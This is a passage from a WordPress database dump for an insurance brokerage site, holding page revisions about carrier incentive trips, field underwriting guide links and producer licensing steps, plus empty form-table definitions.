href=\"http://www.empireins.com/wp-content/uploads/2014/04/ANICO-2016_conference.pdf\" target=\"_blank\">2016 Marketing Conference</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha </strong>\r\n<ul>\r\n <li><strong> </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Penn Mutual </strong>\r\n<ul>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualgoldeneagle2016/pretrip/home.mtc\" target=\"_blank\">2016 Golden Eagle</a></li>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualroyalblue2016/pretrip/home.mtc\" target=\"_blank\">2016 Royal Blue</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-12-10 20:50:08','2015-12-10 20:50:08','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(441,1,'2015-12-10 20:50:56','2015-12-10 20:50:56','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2014/04/ANICO-2016_conference.pdf\" target=\"_blank\">2016 Marketing Conference</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Assurity</strong>:\r\n<ul>\r\n <li><a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha </strong>\r\n<ul>\r\n <li><strong> </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Penn Mutual </strong>\r\n<ul>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualgoldeneagle2016/pretrip/home.mtc\" target=\"_blank\">2016 Golden Eagle</a></li>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualroyalblue2016/pretrip/home.mtc\" target=\"_blank\">2016 Royal Blue</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-12-10 20:50:56','2015-12-10 20:50:56','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(442,1,'2015-12-11 08:53:54','2015-12-11 08:53:54','','slide1','','inherit','open','open','','slide1','','','2015-12-11 08:53:54','2015-12-11 08:53:54','',4,'http://www.empireins.com/wp-content/uploads/2014/04/slide1.jpg',0,'attachment','image/jpeg',0),(443,1,'2015-12-11 09:01:26','2015-12-11 09:01:26','','Untitled-2','','inherit','open','open','','untitled-2','','','2015-12-11 09:01:26','2015-12-11 09:01:26','',45,'http://www.empireins.com/wp-content/uploads/2014/04/Untitled-2.jpg',0,'attachment','image/jpeg',0),(444,1,'2015-12-11 09:03:40','2015-12-11 09:03:40','','box2','','inherit','open','open','','box2','','','2015-12-11 09:03:40','2015-12-11 09:03:40','',46,'http://www.empireins.com/wp-content/uploads/2014/04/box2.jpg',0,'attachment','image/jpeg',0),(445,1,'2015-12-11 09:05:10','2015-12-11 09:05:10','','box3','','inherit','open','open','','box3','','','2015-12-11 09:05:10','2015-12-11 09:05:10','',47,'http://www.empireins.com/wp-content/uploads/2014/04/box3.jpg',0,'attachment','image/jpeg',0),(446,1,'2015-12-11 09:05:33','2015-12-11 09:05:33','','box4','','inherit','open','open','','box4','','','2015-12-11 09:05:33','2015-12-11 09:05:33','',39,'http://www.empireins.com/wp-content/uploads/2014/04/box4.jpg',0,'attachment','image/jpeg',0),(447,1,'2015-12-11 15:46:46','2015-12-11 15:46:46','','Guardian UW Guide','','inherit','open','open','','guardian-uw-guide','','','2015-12-11 15:46:46','2015-12-11 15:46:46','',4,'http://www.empireins.com/wp-content/uploads/2014/04/Guardian-UW-Guide.pdf',0,'attachment','application/pdf',0),(448,1,'2015-12-11 15:47:53','2015-12-11 15:47:53','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life/William Penn</a></li>\r\n <li><a title=\"Guardian UW Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Guardian-UW-Guide.pdf\" target=\"_blank\">Guardian</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"NYL-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf\" target=\"_blank\">New York Life</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-11 15:47:53','2015-12-11 15:47:53','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(449,1,'2015-12-11 16:27:34','2015-12-11 16:27:34','','MN Life 2015 Underwriting Packet','','inherit','open','open','','mn-life-2015-underwriting-packet','','','2015-12-11 16:27:34','2015-12-11 16:27:34','',4,'http://www.empireins.com/wp-content/uploads/2014/04/MN-Life-2015-Underwriting-Packet-.pdf',0,'attachment','application/pdf',0),(450,1,'2015-12-11 16:28:51','2015-12-11 16:28:51','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life / William Penn</a></li>\r\n <li><a title=\"Guardian UW Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Guardian-UW-Guide.pdf\" target=\"_blank\">Guardian</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a title=\"MN-Life-2015-Underwriting-Packet\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MN-Life-2015-Underwriting-Packet-.pdf\" target=\"_blank\">Minnesota Life / Securian </a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"NYL-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf\" target=\"_blank\">New York Life</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-11 16:28:51','2015-12-11 16:28:51','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(451,1,'2015-12-11 16:37:34','2015-12-11 16:37:34','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life / William Penn</a></li>\r\n <li><a title=\"Guardian UW Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Guardian-UW-Guide.pdf\" target=\"_blank\">Guardian</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a title=\"MN-Life-2015-Underwriting-Packet\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MN-Life-2015-Underwriting-Packet-.pdf\" target=\"_blank\">Minnesota Life / Securian</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"NYL-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf\" target=\"_blank\">New York Life</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-11 16:37:34','2015-12-11 16:37:34','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(452,1,'2015-12-16 18:54:35','2015-12-16 18:54:35','','slide-5','','inherit','open','open','','slide-5','','','2015-12-16 18:54:35','2015-12-16 18:54:35','',4,'http://www.empireins.com/wp-content/uploads/2014/04/slide-5.png',0,'attachment','image/png',0),(454,1,'2015-12-23 19:16:40','2015-12-23 19:16:40','','eib-slider-2','','inherit','open','open','','eib-slider-2','','','2015-12-23 19:16:40','2015-12-23 19:16:40','',4,'http://www.empireins.com/wp-content/uploads/2014/04/eib-slider-2.png',0,'attachment','image/png',0),(455,1,'2015-12-23 19:17:25','2015-12-23 19:17:25','','eib-slider-1','','inherit','open','open','','eib-slider-1','','','2015-12-23 19:17:25','2015-12-23 19:17:25','',4,'http://www.empireins.com/wp-content/uploads/2014/04/eib-slider-1.png',0,'attachment','image/png',0),(463,1,'2016-01-11 21:50:39','2016-01-11 21:50:39','<img class=\"\" src=\"http://www.brokerscentral.com/wp-content/uploads/2015/01/550x100.jpg\" alt=\"\" width=\"325\" height=\"59\" />\n\n[webpipesso f=\"iGO\" t=\"link\"]\n\n \n\n ','iGo','','inherit','open','open','','319-autosave-v1','','','2016-01-11 21:50:39','2016-01-11 21:50:39','',319,'http://www.empireins.com/319-autosave-v1/',0,'revision','',0),(466,1,'2016-01-11 21:50:42','2016-01-11 21:50:42','<img class=\"\" src=\"http://www.brokerscentral.com/wp-content/uploads/2015/01/550x100.jpg\" alt=\"\" width=\"325\" height=\"59\" />\r\n\r\n[webpipesso f=\"iGO\" t=\"link\"]\r\n\r\n \r\n\r\n ','iGo','','inherit','open','open','','319-revision-v1','','','2016-01-11 21:50:42','2016-01-11 21:50:42','',319,'http://www.empireins.com/319-revision-v1/',0,'revision','',0),(469,1,'2016-01-11 21:51:31','2016-01-11 21:51:31','[webpipesso f=\"iGO\" t=\"link\"]\r\n\r\n \r\n\r\n<img class=\"\" src=\"http://www.brokerscentral.com/wp-content/uploads/2015/01/550x100.jpg\" alt=\"\" width=\"325\" height=\"59\" />','iGo','','inherit','open','open','','319-revision-v1','','','2016-01-11 21:51:31','2016-01-11 21:51:31','',319,'http://www.empireins.com/319-revision-v1/',0,'revision','',0),(472,1,'2016-01-11 21:52:53','2016-01-11 21:52:53','[webpipesso f=\"iGO\" t=\"link\"]\r\n\r\n \r\n\r\n<img class=\"\" src=\"http://www.brokerscentral.com/wp-content/uploads/2015/01/550x100.jpg\" alt=\"\" width=\"391\" height=\"71\" />','iGo','','inherit','open','open','','319-revision-v1','','','2016-01-11 21:52:53','2016-01-11 21:52:53','',319,'http://www.empireins.com/319-revision-v1/',0,'revision','',0),(477,1,'2016-01-20 14:21:04','2016-01-20 14:21:04','data has successfully submitted!','thankyou','','publish','open','open','','thankyou','','','2016-01-20 14:28:53','2016-01-20 14:28:53','',0,'http://www.empireins.com/?page_id=477',0,'page','',0),(480,1,'2016-01-20 14:21:04','2016-01-20 14:21:04','thank you ','thankyou','','inherit','open','open','','477-revision-v1','','','2016-01-20 14:21:04','2016-01-20 14:21:04','',477,'http://www.empireins.com/477-revision-v1/',0,'revision','',0),(481,1,'2016-01-20 14:23:19','2016-01-20 14:23:19','data has successfully saved!','thankyou','','inherit','open','open','','477-revision-v1','','','2016-01-20 14:23:19','2016-01-20 14:23:19','',477,'http://www.empireins.com/477-revision-v1/',0,'revision','',0),(484,1,'2016-01-20 14:24:02','2016-01-20 14:24:02','Something went wrong.','error','','publish','open','open','','error','','','2016-01-20 14:24:02','2016-01-20 14:24:02','',0,'http://www.empireins.com/?page_id=484',0,'page','',0),(486,1,'2016-01-20 14:24:02','2016-01-20 14:24:02','Something went wrong.','error','','inherit','open','open','','484-revision-v1','','','2016-01-20 14:24:02','2016-01-20 14:24:02','',484,'http://www.empireins.com/484-revision-v1/',0,'revision','',0),(487,1,'2016-01-20 14:28:53','2016-01-20 14:28:53','data has successfully submitted!','thankyou','','inherit','open','open','','477-revision-v1','','','2016-01-20 14:28:53','2016-01-20 14:28:53','',477,'http://www.empireins.com/477-revision-v1/',0,'revision','',0),(491,1,'2016-03-03 21:27:35','2016-03-03 21:27:35','[sso-surelc]\r\n\r\n \r\n\r\n<strong>Contracting and Licensing</strong>\r\n\r\nIn our continued effort to help our producers do business more efficiently, EIB implemented SureLC, a new simplified contracting and appointment process which allows you to complete ONE set of paperwork to contract with ALL carriers you wish to represent. SureLC is free and provides a single repository to manage all aspects of your licensing and contracting needs. In addition to the time saved during the contracting process, SureLC also provides up-to-date licensing statuses for each state license you maintain.\r\n\r\nJust follow the below simple steps:\r\n\r\n \r\n\r\n<strong>First-time Contracting</strong>\r\n<ol>\r\n <li><span style=\"text-decoration: underline;\">Download</span> the SureLC Producer Set-Up Packet</li>\r\n <li>Complete and sign the forms at all designated areas</li>\r\n <li>Return the packet with your E&O and voided check to Chaya Klein (<a href=\"mailto:Chaya@empireins.com\">Chaya@empireins.com</a>) for processing</li>\r\n</ol>\r\n \r\n\r\n<strong>Requesting Additional Appointments</strong>\r\n<ol>\r\n <li>Head to the licensing tab on our website and press “Click to Continue”</li>\r\n <li>Enter your personal information and select the carrier you’d like to become appointed with</li>\r\n <li>Review the carrier contracting forms and select “Apply My Signature”</li>\r\n</ol>\r\n<strong>THAT’S IT! YOU’RE ALL DONE!! </strong>\r\n\r\n \r\n\r\nGot any questions? Reach out to our Licensing Specialist, Chaya Klein, and she will guide you through this very simple and effortless process.\r\n\r\n ','Licensing','','inherit','open','open','','306-autosave-v1','','','2016-03-03 21:27:35','2016-03-03 21:27:35','',306,'http://www.empireins.com/306-autosave-v1/',0,'revision','',0),(514,1,'2016-03-03 21:13:01','2016-03-03 21:13:01','[sso-surelc]\r\n\r\n \r\n\r\n<strong>Contracting and Licensing</strong>\r\n\r\nIn our continued effort to help our producers do business more efficiently, EIB implemented SureLC, a new simplified contracting and appointment process which allows you to complete ONE set of paperwork to contract with ALL carriers you wish to represent. SureLC is free and provides a single repository to manage all aspects of your licensing and contracting needs. In addition to the time saved during the contracting process, SureLC also provides up-to-date licensing statuses for each state license you maintain.\r\n\r\nJust follow the below simple steps:\r\n\r\n \r\n\r\n<strong>First-time Contracting</strong>\r\n<ol>\r\n <li><span style=\"text-decoration: underline;\">Download</span> the SureLC Producer Set-Up Packet</li>\r\n <li>Complete and sign the forms at all designated areas</li>\r\n <li>Return the packet with your E&O and voided check to Chaya Klein (<a href=\"mailto:Chaya@empireins.com\">Chaya@empireins.com</a>) for processing</li>\r\n</ol>\r\n \r\n\r\n<strong>Requesting Additional Appointments</strong>\r\n<ol>\r\n <li>Head to the licensing tab on our website and press “Click to Continue”</li>\r\n <li>Enter your personal information and select the carrier you’d like to become appointed with</li>\r\n <li>Review the carrier contracting forms and select “Apply My Signature”</li>\r\n <li>THAT’S IT! YOU’RE ALL DONE!!</li>\r\n</ol>\r\n \r\n\r\nGot any questions? Reach out to our Licensing Specialist, Chaya Klein, and she will guide you through this very simple and effortless process.\r\n\r\n ','Licensing','','inherit','open','open','','306-revision-v1','','','2016-03-03 21:13:01','2016-03-03 21:13:01','',306,'http://www.empireins.com/306-revision-v1/',0,'revision','',0),(517,1,'2016-03-03 21:27:05','2016-03-03 21:27:05','[sso-surelc]\r\n\r\n \r\n\r\n<strong>Contracting and Licensing</strong>\r\n\r\nIn our continued effort to help our producers do business more efficiently, EIB implemented SureLC, a new simplified contracting and appointment process which allows you to complete ONE set of paperwork to contract with ALL carriers you wish to represent. SureLC is free and provides a single repository to manage all aspects of your licensing and contracting needs. In addition to the time saved during the contracting process, SureLC also provides up-to-date licensing statuses for each state license you maintain.\r\n\r\nJust follow the below simple steps:\r\n\r\n \r\n\r\n<strong>First-time Contracting</strong>\r\n<ol>\r\n <li><span style=\"text-decoration: underline;\">Download</span> the SureLC Producer Set-Up Packet</li>\r\n <li>Complete and sign the forms at all designated areas</li>\r\n <li>Return the packet with your E&O and voided check to Chaya Klein (<a href=\"mailto:Chaya@empireins.com\">Chaya@empireins.com</a>) for processing</li>\r\n</ol>\r\n \r\n\r\n<strong>Requesting Additional Appointments</strong>\r\n<ol>\r\n <li>Head to the licensing tab on our website and press “Click to Continue”</li>\r\n <li>Enter your personal information and select the carrier you’d like to become appointed with</li>\r\n <li>Review the carrier contracting forms and select “Apply My Signature”</li>\r\n</ol>\r\n<strong>THAT’S IT! YOU’RE ALL DONE!! </strong>\r\n\r\n \r\n\r\nGot any questions? Reach out to our Licensing Specialist, Chaya Klein, and she will guide you through this very simple and effortless process.\r\n\r\n ','Licensing','','inherit','open','open','','306-revision-v1','','','2016-03-03 21:27:05','2016-03-03 21:27:05','',306,'http://www.empireins.com/306-revision-v1/',0,'revision','',0),(522,1,'2016-05-11 19:55:01','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2016-05-11 19:55:01','0000-00-00 00:00:00','',0,'http://www.empireins.com/?p=522',0,'post','',0); /*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_form` -- DROP TABLE IF EXISTS `wp_rg_form`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_form` ( `id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(150) NOT NULL, `date_created` datetime NOT NULL, `is_active` tinyint(1) NOT NULL DEFAULT '1', `is_trash` tinyint(1) NOT NULL DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_form` -- LOCK TABLES `wp_rg_form` WRITE; /*!40000 ALTER TABLE `wp_rg_form` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_form` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_form_meta` -- DROP TABLE IF EXISTS `wp_rg_form_meta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_form_meta` ( `form_id` mediumint(8) unsigned NOT NULL, `display_meta` longtext, `entries_grid_meta` longtext, `confirmations` longtext, `notifications` longtext, PRIMARY KEY (`form_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_form_meta` -- LOCK TABLES `wp_rg_form_meta` WRITE; /*!40000 ALTER TABLE `wp_rg_form_meta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_form_meta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_form_view` -- DROP TABLE IF EXISTS `wp_rg_form_view`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET 